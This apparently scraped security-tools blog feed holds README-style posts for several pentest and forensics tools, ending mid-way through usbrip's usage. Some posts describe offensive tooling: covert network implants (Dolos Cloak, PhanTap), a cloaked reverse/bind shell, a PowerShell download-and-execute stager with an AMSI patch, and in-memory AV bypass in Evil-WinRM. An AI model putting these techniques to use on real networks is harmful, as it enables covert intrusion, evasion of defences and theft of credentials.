Dolos Cloak uses iptables, arptables, and ebtables NAT rules in order to spoof the MAC and IP addresses of a trusted network device and blend in with regular network traffic. On boot, the script disallows any outbound network traffic from leaving the Odroid in order to hide the MAC addresses of its network interfaces.Next, the script creates a bridge interface and adds the two external USB ethernet dongles to the bridge. All traffic, including any 802.1x authentication steps, is passed on the bridge between these two interfaces.
In this state, the device is acting like a wire tap. Once the Odroid is plugged in between a trusted device (desktop, IP phone, printer, etc.) and the network, the script listens to the packets on the bridge interface in order to determine the MAC address and IP of the victim device.
Once the script determines the MAC address and IP of the victim device, it configures NAT rules in order to make all traffic on the OUTPUT and POSTROUTING chains look like it is coming from the victim device. At this point, the device is able to communicate with the network without being burned.
Once the Odroid is spoofing the MAC address and IP of the victim device, the script sends out a DHCP request in order to determine its default gateway, search domain, and name servers. It uses the response in order to configure its network settings so that the device can communicate with the rest of the network.
At this point, the Odroid is acting as a stealthy foothold on the network. Operators can connect to the Odroid over the built-in NIC eth0 in order to obtain network access. The device can also be configured to send out a reverse shell so that operators can utilize the device as a drop box and run commands on the network remotely.
For example, the script can be configured to run an Empire python stager after running the man-in-the-middle attack. You can then use the Empire C2 connection to upgrade to a TCP reverse shell or VPN tunnel.
Installation and Usage
- Perform default install of Kali ARM on Odroid C2.
- Be sure to save this project to /root/tools/dolos_cloak
- Plug one external USB NIC into the Odroid and run dhclient to get internet access in order to install dependencies:
- Run the install script to get all the dependencies and set the Odroid to perform the MitM on boot by default. Keep in mind that this will make drastic changes to the device's network settings and disable Network Manager. You may want to download any additional tools before this step:
./setup.sh
- You may want to install some other tools like 'host' that do not come standard on Kali ARM. Empire, enum4linux, and responder are also nice additions.
- Make sure you are able to ssh into the Odroid via the built-in NIC eth0. Add your public key to /root/.ssh/authorized_keys for fast access.
- Modify config.yaml to meet your needs. You should make sure the interfaces match the default names that your Odroid is giving your USB dongles. Order does not matter here. You should leave client_ip, client_mac, gateway_ip, and gateway_mac blank unless you used a LAN tap to mine them. The script should be able to figure this out for us. Set these options only if you know for sure their values. The management_int, domain_name, and dns_server options are placeholders for now but will be usefull very soon. For shells, you can set up a custom autorun command in the config.yaml to run when the man-in-middle attack has autoconfigured. You can also set up a cron job to send back shells.
- Connect two usb ethernet dongles and reboot the device (you need two because the built-in ethernet won't support promiscuous mode)
- Boot the device and wait a few seconds for autosniff.py to block the OUTPUT ethernet and IP chains. Then plug in the Odroid between a trusted device and the network.
- PWN N00BZ, get $$$, have fun, hack the planet
Tips
- Mod and run ./scripts/upgrade_to_vpn.sh to turn a stealthy Empire agent into a full blown VPN tunnel
- Mod and run ./scripts/reverse_listener_setup.sh to set up a port for a reverse listener on the device.
- Run ./scripts/responder_setup.sh to allow control of the protocols that we capture for responder. You shoud run responder on the bridge interface:
- Be careful as some NAC solutions use port 445, 443, and 80 to periodically verify hosts. Working on a solution to this.
- Logs help when the autosniff.py misbehaves. The rc.local is set to store the current session logs in ./logs/session.log and logs in ./logs/history.log so we can reboot and still check the last session's log if need be. Log files have cool stuff in them like network info, error messages, and all bash commands to set up the NAT ninja magic.
Download Dolos Cloak
Date of publish: Mon, 23 Sep 2019 07:54:00 +0000
PostShell - Post Exploitation Bind/Backconnect Shell
PostShell is a post-exploitation shell that includes both a bind and a back connect shell. It creates a fully interactive TTY which allows for job control.
The stub size is around 14kb and can be compiled on any Unix like system. Banner and interaction with shell after a connection is started.
Why not use a traditional Backconnect/Bind Shell?
PostShell allows for easier post-exploitation by making the attacker less dependant on dependencies such as Python and Perl.It also incorporates both a back connect and bind shell, meaning that if a target doesn't allow outgoing connections an operator can simply start a bind shell and connect to the machine remotely.
PostShell is also significantly less suspicious than a traditional shell due to the fact both the name of the processes and arguments are cloaked.
Features
- Anti-Debugging, if ptrace is detected as being attached to the shell it will exit.
- Process Name/Thread names are cloaked, a fake name overwrites all of the system arguments and file name to make it seem like a legitimate program.
- TTY, a TTY is created which essentially allows for the same usage of the machine as if you were connected via SSH.
- Bind/Backconnect shell, both a bind shell and back connect can be created.
- Small Stub Size, a very small stub(<14kb) is usually generated.
- Automatically Daemonizes
- Tries to set GUID/UID to 0 (root)
Getting Started
- Downloading: git clone https://github.com/rek7/postshell
- Compiling: cd postshell && sh compile.sh This should create a binary called "stub" this is the malware.
Commands
$ ./stubBind Shell Usage: ./stub port
Back Connect Usage: ./stub ip port
$
Example Usage
Backconnect:$ ./stub 127.0.0.1 13377
Bind Shell:
$ ./stub 13377
Receiving a Connection with Netcat
Recieving a backconnect:
$ nc -vlp port
Connecting to a bind Shell:
$ nc host port
TODO:
Add domain resolutionDownload PostShell
Disclaimer: These scripts for knowledge purpose only
Date of publish: Tue, 10 Sep 2019 06:31:00 +0000
FinDomain- Fastest And Cross-platform Subdomain Enumerator.
Comparison
It comparison gives you a idea why you should use findomain instead of another enumerators. The domain used for the test was Microsoft.com in the following BlackArch virtual machine:
Host: KVM/QEMU (Standard PC (i440FX + PIIX, 1996) pc-i440fx-3.1)
Kernel: 5.2.6-arch1-1-ARCH
CPU: Intel (Skylake, IBRS) (4) @ 2.904GHz
Memory: 139MiB / 3943MiB
Find-Domain used to calculate the time, is the time command in Linux.
You can see all the details of the tests in it link.
I can't wait to the amass test for finish, looks like it will never ends and additionally the resources usage is very high.
Note: The benchmark was made the 10/08/2019, since it point other software's can improve things and you will got different results.
Features
- Discover sub-domains without brute-force, it uses Certificate Transparency Logs.
- Discover sub-domains with or without IP address according to user arguments.
- Read target from user argument (-t).
- Read a list of targets from file and discover their sub-domains with or without IP and also write to output files per-domain if specified by the user, recursively.
- Write output to TXT file.
- Write output to CSV file.
- Write output to JSON file.
- Cross platform support: Any platform.
- Optional multiple API support.
- Proxy support.
Note: the proxy support is just to proxify APIs requests, the actual implementation to discover IP address of sub-domains doesn't support proxyfing and it's made using the host network still if you use the -p option.
How it works?
It tool doesn't use the common methods for sub(domains) discover, the tool uses Certificate Transparency logs to find sub-domains and it method make it tool the most faster and reliable. The tool make use of multiple public available APIs to perform the search. If you want to know more about Certificate Transparency logs, read https://www.certificate-transparency.org/APIs that are using at the moment:
- Certspotter: https://api.certspotter.com/
- Crt.sh : https://crt.sh
- Virustotal: https://www.virustotal.com/ui/domains/
- Sublit3r: https://api.sublist3r.com/
- Facebook: https://developers.facebook.com/docs/certificate-transparency
If you know other that should be added, open an issue.
Supported platforms in our binary releases
All supported platforms in the binarys that we give are 64 bits only and we don't have plans to add support for 32 bits binary releases, if you want to have support for 32 bits follow the documentation.- Linux
- Windows
- MacOS
- ARM
- Arch64 (Raspberry Pi)
Build for 32 bits or another platform
If you want to build the tool for your 32 bits system or another platform, follow it steps:Note: You need to have rust, make and perl installed in your system first.
Using the Github source code:
- Clone the repository or download the release source code.
- Extract the release source code (only needed if you downloaded the compressed file).
- Go to the folder where the source code is.
- Execute cargo build --release
- Now your binary is in target/release/findomain and you can use it.
Installation Android (Termux)
Install the Termux package, open it and follow it commands:$ pkg install rust make perl
$ cargo install findomain
$ cd $HOME/.cargo/bin
$ ./findomain
Installation in Linux using source code
If you want to install it, you can do that manually compiling the source or using the precompiled binary.Manually: You need to have rust, make and perl installed in your system first.
$ git clone https://github.com/Edu4rdSHL/findomain.git
$ cd findomain
$ cargo build --release
$ sudo cp target/release/findomain /usr/bin/
$ findomain
Installation in Linux using compiled artifacts
$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-linux$ chmod +x findomain-linux
$ ./findomain-linux
If you are using the BlackArch Linux distribution, you just need to use:
$ sudo pacman -S findomain
Installation ARM
$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-arm$ chmod +x findomain-arm
$ ./findomain-arm
Installation Aarch64 (Raspberry Pi)
$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-aarch64$ chmod +x findomain-aarch64
$ ./findomain-aarch64
Installation Windows
Download the binary fromhttps://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-windows.exe
Open a CMD shell and go to the dir where findomain-windows.exe was downloaded.
Exec: findomain-windows in the CMD shell.
Installation MacOS
$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-osx$ chmod +x findomain-osx.dms
$ ./findomain-osx.dms
Usage
You can use the tool in two ways, only discovering the domain name or discovering the domain + the IP address.findomain 0.2.0
Eduard Tolosa <tolosaeduard@gmail.com>
A tool that use Certificates Transparency logs to find subdomains.
USAGE:
findomain [FLAGS] [OPTIONS]
FLAGS:
-a, --all-apis Use all the available APIs to perform the search. It take more time but you will have a lot of
more results.
-h, --help Prints help information
-i, --get-ip Return the subdomain list with IP address if resolved.
-V, --version Prints version information
OPTIONS:
-f, --file <file> Sets the input file to use.
-o, --output <output> Write data to output file in the specified format. [possible values: txt, csv, json]
-p, --proxy <proxy> Use a proxy to make the requests to the APIs.
-t, --target <target> Target host
Examples
Make a simple search of subdomains and print the info in the screen:findomain -t example.com
Make a simple search of subdomains using all the APIs and print the info in the screen:
findomain -t example.com -a
Make a search of subdomains and export the data to a CSV file:
findomain -t example.com -o csv
Make a search of subdomains using all the APIs and export the data to a CSV file:
findomain -t example.com -a -o csv
Make a search of subdomains and resolve the IP address of subdomains (if possible):
findomain -t example.com -i
Make a search of subdomains with all the APIs and resolve the IP address of subdomains (if possible):
findomain -t example.com -i -a
Make a search of subdomains with all the APIs and resolve the IP address of subdomains (if possible), exporting the data to a CSV file:
findomain -t example.com -i -a -o csv
Make a search of subdomains using a proxy (http://127.0.0.1:8080 in it case, the rest of aguments continue working in the same way, you just need to add the -p flag to the before commands):
findomain -t example.com -p http://127.0.0.1:8080
Download FinDomain
Date of publish: Sat, 24 Aug 2019 08:56:00 +0000
Burp Scope Monitor Extension
A Burp Suite Extension to monitor and keep track of tested endpoints.
Main Features
- Simple, easy way to keep track of unique endpoints when testing an application
- Mark individual endpoints as analyzed or not
- Instantly understand when a new endpoint, not tested is requested
- Accessible from Proxy tab (right click, mark request as analyzed/not)
- Send to Repeater
- Enforcement of Burp's in scope rules
- Import/Export state file directly to a CSV file for
- Autosave option
Installation
- Make sure you have Jython configured under Extender -> Options -> Python Environment. For further instructions, check PortSwigger official instructions at their support page.
- git clone git@github.com:Regala/burp-scope-monitor.git
- Import main.py in Extender - Extender -> Extensions -> Add -> Select Python -> Select main.py
Documentation
Most of the options available in General or Import tabs are auto-explanatory.- "Repeater request automatically marks as analyzed" - when issuing a request to an endpoint from repeater, it marks this request as analyzed automatically.
- "Color request in Proxy tab" - this essentially applies the behavior of the extension in the Proxy tab, if you combine these options with "Show only highlighted items" in Proxy. However, it's not as pleasant to the eyes as the color pallete is limited.
- "Autosave periodically" - backups the state file every 10 minutes. When activating this option, consider disabling "Autostart Scope Monitor". This is in order to maintain a different state file per Burp project. However, you can easily maintain only one, master state file.
- "Import/Export" is dedicated to handle the saved state files. It's preferred to open your Burp project file associated with the Scope Monitor. It will still work if the Burp project is different, but when loading the saved entries, you won't be able to send them to Repeater or view the request itself in the Request/Response viewer (this is due to the fact that we are not storing the actually requests - just the endpoint, it's analyzed status and a couple of other more. This makes it a little bit more efficient).
Future Development
- Keep track of parameters observed in all requests
- Highlight when a new parameter was used in an already observed/analyzed endpoint
- Export to spreadsheet / Google Sheets
- Adding notes to the endpoint
Implementation
The code is not yet performant, optimized or anything similar. KISS and it works. Performance will be increased depending on demand and how the extension performs when handling large Burp projects.To circumvent some of Burp's Extender API limitations, some small hacks were implemented. One of those is automatically setting a comment on the requests that flow in the Proxy tab.
You can still add comments on the items, as you'd normally would, but just make sure to keep the placeholder string (scope-monitor-placeholder) there.
Hopefully in the future each requestResponse from Burp will have a unique identifier, which would make the import state / load from file much cleaner and fast. With large state files, this might hang a bit when loading.
Download Burp Scope Monitor
Date of publish: Wed, 21 Aug 2019 11:45:00 +0000
Slurp- Blackbox/Whitebox S3 Bucket Enumerator
To Evaluate the security of S3 buckets
Overview
- Credit to all the vendor packages to develop Slurp possible.
- Slurp is for pen-testers and security professionals to perform audits of s3 buckets.
Features
- Scan via domain(s); you can target a single domain or a list of domains
- Scan via keyword(s); you can target a single keyword or a list of keywords
- Scan via AWS credentials; you can target your own AWS account to see which buckets have been exposed
- Colorized output for visual grep
- Currently generates over 28,000 permutations per domain and keyword (thanks to @jakewarren and @random-robbie)
- Punycode support for internationalized domains
- Strong copyleft license (GPLv3)
Modes
There are two modes that this tool operates at; blackbox and whitebox mode. Whitebox mode (or internal) is significantly faster than blackbox (external) mode.Blackbox (external)
In this mode, you are using the permutations list to conduct scans. It will return false positives and there is no way to link the buckets to an actual aws account! Do not open issues asking how to do this.Domain
Keywords
Whitebox (internal)
In this mode, you are using the AWS API with credentials on a specific account that you own to see what is open. This method pulls all S3 buckets and checks Policy/ACL permissions. Note that, I will not provide support on how to use the AWS API.Your credentials should be in ~/.aws/credentials.
Internal
Usage
- slurp domain <-t|--target> example.com will enumerate the S3 domains for a specific target.
- slurp keyword <-t|--target> linux,golang,python will enumerate S3 buckets based on those 3 key words.
- slurp internal performs an internal scan using the AWS API.
Installation
This project uses vgo; you can clone and go build or download from Releases section.Please do not open issues on why you cannot build the project; this project builds like any other project would in Go, if you cannot build then I strongly suggest you read the go spec.
Also, the only binaries I'm including are linux/amd64; if you want mac/windows binaries, build it yourself.
Download Slurp
Date of publish: Wed, 07 Aug 2019 21:47:00 +0000
PowerHub- A Post Exploitation Suite To Bypass Endpoint Protection
PowerHub is a convenient post exploitation tool which aids a pentester in transferring files, in particular code which may get flagged by endpoint protection.
During an engagement where you have a test client available, one of the first things you want to do is run PowerSploit. So you need to download the files, messing with endpoint protection, disable the execution policy, etc.
PowerHub provides an (almost) one-click-solution for this. Oh, and you can also run arbitrary binaries (PE and shell code) entirely in-memory using PowerSploit's modules, which is sometimes useful to bypass application whitelisting.
Your loot (Kerberos tickets, passwords, etc.) can be easily transferred back either as a file or a text snippet, via the command line or the web interface. PowerHub also helps with collaboration in case you're a small team.
On top of that, PowerHub comes with a reverse PowerShell, making it suitable for any kind of post-exploitation action.
Here is a simple example (grab information about local groups with PowerView and transfer it back):
PS C:\Users\avollmer> $K=new-object net.webclient;IEX $K.downloadstring('http://192.168.11.2:8000/0');
_____ _____ _ _ _ _______ ______ _ _ _ _ ______
|_____] | | | | | |______ |_____/ |_____| | | |_____]
| |_____| |__|__| |______ | \_ | | |_____| |_____]
written by Adrian Vollmer, 2018-2019
Run 'Help-PowerHub' for help
AmsiScanBuffer patch has been applied.
0
PS C:\Users\avollmer> lhm powerview
[*] /ps1/PowerSploit/Recon/PowerView.ps1 imported.
PS C:\Users\avollmer> Get-LocalGroup | pth -Name groups.json
Installation
PowerHub itself does not need to be installed. Just execute powerhub.py. However, there are a few dependencies. They are listed in the requirements.txt. Install them either via pip3 install --user -r requirements.txt or use a virtual environment:Run python3 -m venv env to create a virtual environment, then use source env/bin/activate to activate it. Now run pip3 install -r requirements.txt to install the depencendies inside the virtual environment.
Python2 is not supported.
Usage
PowerHub has one mandatory argument: the callback host (can be an IP address). You should also use --auth <user>:<pass>, otherwise, a randomly generated password will be used for basic authentication.The switch --no-auth disables basic authentication which is not recommended. The callback host name is used by the stager to download the payload. If the callback port or path differ from the default, it can also be changed.
Read ./powerhub.py --help and the Wiki for details.
Download PowerHub
Date of publish: Wed, 07 Aug 2019 21:15:00 +0000
Phantom Tap (PhanTap) - An ‘Invisible’ Network Tap Aimed at Red Teams.
With limited physical access to a target building, this tap can be installed inline between a network device and the corporate network.
PhanTap is silent in the network and does not affect the victim’s traffic, even in networks having NAC (Network Access Control 802.1X - 2004). PhanTap will analyze traffic on the network and mask its traffic as the victim device.
It can mount a tunnel back to a remote server, giving the user a foothold in the network for further analysis and pivoting. PhanTap is an OpenWrt package and should be compatible with any device. The physical device used for our testing is currently a small, inexpensive router, the GL.iNet GL-AR150.
Features:
- Transparent network bridge.
- Silent : No ARP, multicast, broadcast.
- 802.1x passthrough.
- Automatic configuration:
SNAT bridge traffic to the victim MAC and IP address,
set the router default gateway to the MAC of the gateway detected just before.
- Introspects ARP, multicast and broadcast traffic and adds a route to the machine IP address and adds the machine MAC address to the neighbor list, hence giving the possibility of talking to all the machines in the local network.
- Learns the DNS server from traffic and modifies the one on the router so that it's the same.
- Can run commands (ex: /etc/init.d/openvpn restart) when a new IP or DNS is configured.
- Lets you choose any VPN software, for example OpenVPN tcp port 443 so it goes through most firewalls.
- You can talk to the victim machine (using the gateway IP).
Setup
PhanTap has been tested with the GL.iNet GL-AR150. This device has two separate network interfaces in OpenWrt (eth0, eth1).If your device is using an internal switch (swconfig based) with interfaces like eth0.1, eth0.2, some special traffic might be blocked, e.g. 802.1Q (tagged vlan), but PhanTap should work.
- Install a snapshot build, for the GL.iNet GL-AR150
- Update the OpenWrt package list
- Install PhanTap package:
- Configure the Wifi and start administering the router through it.
- Either reboot the device, or run /etc/init.d/phantap setup.
- Get the interface names from that device:
network.loopback.ifname='lo'
network.lan.ifname='eth1'
network.wan.ifname='eth0'
network.wan6.ifname='eth0'
In this example we are using a GL-AR150, which only has 2 interfaces.
Add the interfaces to the phantap bridge via the following commands in the cli (assuming we are using a GL-AR150):
- uci delete network.lan.ifname
- uci delete network.wan.ifname
- uci delete network.wan6.ifname
- uci set network.phantap.ifname='eth0 eth1'
- uci commit network
- /etc/init.d/network reload
Phantap is now configured, as soon as you plug it between a victim and their switch, it will automatically configure the router and give it Internet access.
You can add your favorite VPN to have a remote connection back. Tested PhanTap with Vpn, port TCP 443, to avoid some detection methods.
You can also add a command to be ran when a new IP or DNS is configured, in /etc/config/phantap, e.g. /etc/init.d/openvpn restart (restart VPN service).
You can also look at disabling the wifi by default and using hardware buttons to start it (https://openwrt.org/docs/guide-user/hardware/hardware.button).
Limitations or how it can be detected :
- The GL.iNet GL-AR150 and most inexpensive devices only support 100Mbps, meanwhile modern network traffic will be 1Gbps.
- The network port will stay up, switch side, when the victim device is disconnected/shutdown.
- There is no re-configuration of PhanTap, so we might use an IP that has been reattributed to another device (roadmap DHCP).
- Some traffic is blocked by the Linux bridge (STP/Pause frames/LACP).
Roadmap :
- Add logic to restart the detection when the links go up/down.
- Add DHCP packet analysis for dynamic reconfiguration.
- Add IPv6 support.
- Test limitations of devices that have switches(swconfig) instead of separate interfaces.
Date of publish: Wed, 07 Aug 2019 20:47:00 +0000
CloudCheck- To Test String If A Cloudflare DNS Bypass is Possible
Cloudcheck is made to be used in the same folder as CloudFail. Make sure all files in this repo are in the same folder before using.
CloudFail is a tactical reconnaissance tool which aims to gather enough information about a target protected by Cloudflare in the hopes of discovering the location of the server.
Using Tor to mask all requests, the tool as of right now has 3 different attack phases.
- Misconfigured DNS scan using DNSDumpster.com.
- Scan the Crimeflare.com database.
- Bruteforce scan over 2500 subdomains.
Cloudcheck create a empty text file called none.txt in the data folder, that way it doesn't do a subdomain brute when testing.
Cloudcheck will automatically change your hosts file, using entries from CloudFail and test for a specified string to detect if said entry can be used to bypass Cloudflare.
If output comes out to be "True", you can use the IP address to bypass Cloudflare in your hosts file. (Later automating this process)
Download Cloudcheck
Date of publish: Fri, 02 Aug 2019 17:03:00 +0000
This shell is the ultimate WinRM shell for hacking/pentesting.
WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol.
A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system adminsitrators.
This program can be used on any Microsoft Windows Servers with this feature enabled (usually at port 5985), of course only if you have credentials and permissions to use it. So we can say that it could be used in a post-exploitation hacking/pentesting phase.
The purpose of this program is to provide nice and easy-to-use features for hacking. It can be used with legitimate purposes by system administrators as well but the most of its features are focused on hacking/pentesting stuff.
Features
- Command History
- WinRM command completion
- Local files completion
- Upload and download files
- List remote machine services
- FullLanguage Powershell language mode
- Load Powershell scripts
- Load in memory dll files bypassing some AVs
- Load in memory C# (C Sharp) compiled exe files bypassing some AVs
- Colorization on output messages (can be disabled optionally)
Help
Usage:evil-winrm -i IP -u USER -s SCRIPTS_PATH -e EXES_PATH [-P PORT] [-p PASS] [-U URL]
- -i, --ip IP Remote host IP or hostname (required)
- -P, --port PORT Remote host port (default 5985)
- -u, --user USER Username (required)
- -p, --password PASS Password
- -s, --scripts PS_SCRIPTS_PATH Powershell scripts path (required)
- -e, --executables EXES_PATH C# executables path (required)
- -U, --url URL Remote url endpoint (default /wsman)
- -V, --version Show version
- -h, --help Display this help message
Requirements
Ruby 2.3 or higher is needed. Some ruby gems are needed as well: winrm >=2.3.2, winrm-fs >=1.3.2, stringio >=0.0.2 and colorize >=0.8.1.~$ sudo gem install winrm winrm-fs colorize stringio
Installation
Step 1. Clone the repo:git clone https://github.com/Hackplayers/evil-winrm.git
Step 2. Ready. Just launch it!
~$ cd evil-winrm && ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
If you don't want to put the password in clear text, you can optionally avoid to set -p argument and the password will be prompted preventing to be shown.
To use IPv6, the address must be added to /etc/hosts.
Alternative installation method as ruby gem
Step 1. Install it:
gem install evil-winrm
Step 2. Ready. Just launch it!
~$ evil-winrm -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!' -s '/home/foo/ps1_scripts/' -e '/home/foo/exe_files/'
Documentation
Basic commands- upload: local files can be auto-completed using tab key. It is not needed to put a remote_path if the local file is in the same directory as evil-winrm.rb file.
- usage: upload local_path remote_path
- download: it is not needed to set local_path if the remote file is in the current directory.
- usage: download remote_path local_path
- services: list all services. No administrator permissions needed.
- menu: load the Invoke-Binary and l04d3r-LoadDll functions that we will explain below. When a ps1 is loaded all its functions will be shown up.
Load powershell scripts
To load a ps1 file you just have to type the name (auto-completion usnig tab allowed). The scripts must be in the path set at -s argument. Type menu again and see the loaded functions.
Advanced commands
Invoke-Binary: allows exes compiled from c# to be executed in memory. The name can be auto-completed using tab key and allows up to 3 parameters. The executables must be in the path set at -e argument.
l04d3r-LoadDll: allows loading dll libraries in memory, it is equivalent to: [Reflection.Assembly]::Load([IO.File]::ReadAllBytes("pwn.dll"))
The dll file can be hosted by smb, http or locally. Once it is loaded type menu, then it is possible to autocomplete all functions.
Extra features
To disable colors just modify on code this variable $colors_enabled. Set it to false: $colors_enabled = false
Disclaimer
Evil-WinRM should be used for authorized penetration testing and/or nonprofit educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own servers and/or with the server owner's permission.Download Winrm
Date of publish: Wed, 31 Jul 2019 12:21:00 +0000
Simple command line forensics tool for tracking USB device artifacts (history of USB events) on GNU/Linux.
usbrip (derived from "USB Ripper", not "USB R.I.P." astonished) is an open source forensics tool with CLI interface that lets you keep track of USB device artifacts (aka USB event history, "Connected" and "Disconnected" events) on Linux machines.
usbrip is a small piece of software written in pure Python 3 (using some external modules though, see Dependencies/PIP) which parses Linux log files (/var/log/syslog* or /var/log/messages* depending on the distro) for constructing USB event history tables. Such tables may contain the following columns: "Connected" (date & time), "User", "VID" (vendor ID), "PID" (product ID), "Product", "Manufacturer", "Serial Number", "Port" and "Disconnected" (date & time).
Besides, it also can:
- export gathered information as a JSON dump (and open such dumps, of course);
- generate a list of authorized (trusted) USB devices as a JSON (call it auth.json);
- search for "violation events" based on the auth.json: show (or generate another JSON with) USB devices that do appear in history and do NOT appear in the auth.json;
- When installed with -s flag create crypted storages (7zip archives) to automatically backup and accumulate USB events with the help of crontab scheduler;
- search additional details about a specific USB device based on its VID and/or PID.
Quick Start
usbrip is available for download and installation at PyPI:$ pip3 install usbrip
Git Clone
For simplicity, lets agree that all the commands where ~/usbrip$ prefix is appeared are executed in the ~/usbrip directory which is created as a result of git clone:~$ git clone https://github.com/snovvcrash/usbrip.git usbrip && cd usbrip
~/usbrip$
Dependencies
usbrip works with non-modified structure of system log files only, so, unfortunately, it won't be able to parse USB history if you change the format of syslogs (with syslog-ng or rsyslog, for example). That's why the timestamps of "Connected" and "Disconnected" fields don't have the year, by the way. Keep that in mind.DEB Packages
- python3.6 (or newer) interpreter
- python3-venv
- p7zip-full (used by storages module)
- ~$ sudo apt install -y python3-venv p7zip-full
PIP Packages
usbrip makes use of the following external modules:- terminaltables
- termcolor
To resolve Python dependencies manually (it's not necessary actually because pip or setup.py can automate the process, see Installation) create a virtual environment (optional) and run pip from within:
~/usbrip$ python3 -m venv venv && source venv/bin/activate
(venv) ~/usbrip$ pip install -r requirements.txt
Or let the pipenv one-liner do all the dirty work for you:
~/usbrip$ pipenv install && pipenv shell
After that you can run usbrip portably:
(venv) ~/usbrip$ python -m usbrip -h
Or
(venv) ~/usbrip$ python __main__.py -h
Installation
There are two ways to install usbrip into the system: pip or setup.py.pip or setup.py
First of all, usbrip is pip installable. This means that after git cloning the repo you can simply fire up the pip installation process and after that run usbrip from anywhere in your terminal like so:
~/usbrip$ python3 -m venv venv && source venv/bin/activate
(venv) ~/usbrip$ pip install .
(venv) ~/usbrip$ usbrip -h
Or if you want to resolve Python dependencies locally (without bothering PyPI), use setup.py:
~/usbrip$ python3 -m venv venv && source venv/bin/activate
(venv) ~/usbrip$ python setup.py install
(venv) ~/usbrip$ usbrip -h
alien Note: you'd likely want to run the installation process while the Python virtual environment is active (like it is shown above).
install.sh
Secondly, usbrip can also be installed into the system with the ./installers/install.sh script.When using the ./installers/install.sh some extra features become available:
- the virtual environment is created automatically;
- the storage module becomes available: you can set a crontab job to backup USB events on a schedule (the example of crontab jobs can be found in usbrip/cron/usbrip.cron).
Warning: if you are using the crontab scheduling, you want to configure the cron job with sudo crontab -e in order to force the storage update submodule run as root as well as protect the passwords of the USB event storages. The storage passwords are kept in /var/opt/usbrip/usbrip.ini.
The ./installers/uninstall.sh script removes all the installation artifacts from your system.
To install usbrip use:
~/usbrip$ chmod +x ./installers/install.sh
~/usbrip$ sudo -H ./installers/install.sh [-l/--local] [-s/--storages]
~/usbrip$ cd
~$ usbrip -h
- When -l switch is enabled, Python dependencies are resolved from local .tar packages (./3rdPartyTools/) instead of PyPI.
- When -s switch is enabled, not only the usbrip project is installed, but also the list of trusted USB devices, history and violations storages are created.
Note: when using -s option during installation, make sure that system logs do contain at least one external USB device entry. It is a necessary condition for usbrip to successfully create the list of trusted devices (and as a result, successfully create the violations storage).
After the installation completes, feel free to remove the usbrip folder.
Paths
When installed, the usbrip uses the following paths:- /opt/usbrip/ — project's main directory;
- /var/opt/usbrip/usbrip.ini — usbrip configuration file: keeps passwords for 7zip storages;
- /var/opt/usbrip/storage/ — USB event storages: history.7z and violations.7z (created during the installation process);
- /var/opt/usbrip/log/ — usbrip logs (recommended to log usbrip activity when using crontab, see usbrip/cron/usbrip.cron);
- /var/opt/usbrip/trusted/ — list of trusted USB devices (created during the installation process);
- /usr/local/bin/usbrip — symlink to the /opt/usbrip/venv/bin/usbrip script.
cron
Cron jobs can be set as follows:~/usbrip$ sudo crontab -l > tmpcron && echo "" >> tmpcron
~/usbrip$ cat usbrip/cron/usbrip.cron | tee -a tmpcron
~/usbrip$ sudo crontab tmpcron
~/usbrip$ rm tmpcron
uninstall.sh
To uninstall usbrip use:~/usbrip$ chmod +x ./installers/uninstall.sh
~/usbrip$ sudo ./installers/uninstall.sh [-a/--all]
When -a switch is enabled, not only the usbrip project directory is deleted, but also all the storages and usbrip logs are deleted too.
And don't forget to remove the cron job.
Usage
Synopsis# ---------- BANNER ----------
$ usbrip banner
Get usbrip banner.
# ---------- EVENTS ----------
$ usbrip events history [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]
Get USB event history.
$ usbrip events open <DUMP.JSON> [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]
Open USB event dump.
$ usbrip events gen_auth <OUT_AUTH.JSON> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]
Generate a list of trusted (authorized) USB devices.
$ usbrip events violations <IN_AUTH.JSON> [-a <ATTRIBUTE> [<ATTRIBUTE> ...]] [-t | -l] [-e] [-n <NUMBER_OF_EVENTS>] [-d <DATE> [<DATE> ...]] [--user <USER> [<USER> ...]] [--vid <VID> [<VID> ...]] [--pid <PID> [<PID> ...]] [--prod <PROD> [<PROD> ...]] [--manufact <MANUFACT> [<MANUFACT> ...]] [--serial <SERIAL> [<SERIAL> ...]] [--port <PORT> [<PORT> ...]] [-c <COLUMN> [<COLUMN> ...]] [-f <FILE> [<FILE> ...]] [-q] [--debug]
Get USB violation events based on the list of trusted devices.
# ---------- STORAGE ----------
$ usbrip storage list <STORAGE_TYPE> [-q] [--debug]
List contents of the selected storage (7zip archive). STORAGE_TYPE is "history" or "violations".
